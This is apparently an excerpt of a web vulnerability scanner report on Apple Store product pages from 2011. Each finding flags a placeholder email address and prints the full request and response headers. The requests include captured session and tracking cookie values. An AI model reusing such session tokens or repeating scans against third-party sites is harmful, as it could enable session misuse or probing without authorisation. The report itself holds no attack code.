<title>Belkin TuneBase FM with Handsfree - Apple Store (U.S.)</titl
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.47. http://store.apple.com/us/product/H2431LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H2431LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H2431LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:04:11 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:42 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "8a8e47d72a49f837957fd7a2ef6217cb"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:42 GMT
x-request-id: f08fcf40-6276-4962-bef3-2057b2250f9d
Content-Length: 76893
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Belkin TuneCast Auto Live - Apple Store (U.S.)</title>

<met
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.48. http://store.apple.com/us/product/H2652LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H2652LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H2652LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:08:39 GMT
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-request-id: 463e0293-b3e4-4d72-9cbf-824c2668d011
Last-Modified: Thu, 03 Feb 2011 18:06:57 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:39 GMT
ETag: "4b80d1641a2aa0c279be0bba6d6f8ac9"
Vary: accept-encoding
Content-Length: 76033
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Belkin Aircast Bluetooth In-car Adapter - Apple Store (U.S.)
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.49. http://store.apple.com/us/product/H2654LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H2654LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H2654LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:07:00 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:45 GMT
ETag: "07dd1d280f31a4ee21da19bb5ad55c95"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:45 GMT
x-request-id: c89e959b-707d-44c3-be51-7f3d357933e5
Content-Length: 88161
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Belkin TuneBase FM Live - Apple Store (U.S.)</title>

<meta
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.50. http://store.apple.com/us/product/H2841ZM/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H2841ZM/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H2841ZM/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:07:07 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:55 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "df84ae7629da73a4b959295804904489"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:55 GMT
x-request-id: 7ea3d9a4-b2a8-461f-80e0-74bf45cb1118
Content-Length: 88673
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>kate spade new york Agenda for iPhone 4 - Apple Store (U.S.)
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.51. http://store.apple.com/us/product/H2902VC/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H2902VC/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H2902VC/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:08:47 GMT
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-request-id: c21b6a2d-d275-4d68-993f-4dcd9471b16f
Last-Modified: Thu, 03 Feb 2011 18:07:02 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:47 GMT
ETag: "0f3690baf9c2d6f3ce29a1095e0dac00"
Vary: accept-encoding
Content-Length: 72055
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Griffin iTrip DualConnect for iPad, iPhone and iPod touch -
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.52. http://store.apple.com/us/product/H3200LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/H3200LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/H3200LL/A?fnode=MTY1NDA2MQ&mco=MTk3NTg3MDI HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:58:32 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:23 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "ae23f7cc186587feda1448cf8e888f09"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:23 GMT
x-request-id: ec8c7fda-925b-42ea-aa9a-c988351908cb
Content-Length: 83540
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Kensington Quick Release Car Mount - Apple Store (U.S.)</tit
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.53. http://store.apple.com/us/product/M9720  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/M9720

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/M9720 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home/shop_ipod/family/ipod_classic/engrave%2526pidt%253D1%2526oid%253DMTA4NTI1NTY%2526oidt%253D1%2526ot%253DIMAGE%2526oi%253D1%26appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20index%20(US);

Response

HTTP/1.1 200 OK
x-request-id: 6c038fa3-fa29-4ad0-99a4-4a5c512c8d39
Cache-Control: private, max-age=600
Vary: accept-encoding
Expires: Thu, 03 Feb 2011 18:02:57 GMT
Last-Modified: Thu, 03 Feb 2011 17:52:47 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "8b3cab5f81010be12acc5fe24bc12fc7"
Date: Thu, 03 Feb 2011 17:52:57 GMT
Content-Length: 97128
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />

<title>Apple iPod Socks - Apple Store (U.S.)</title>

<meta http-equiv="X-UA-C
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.54. http://store.apple.com/us/product/MA850  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/MA850

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/MA850 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; 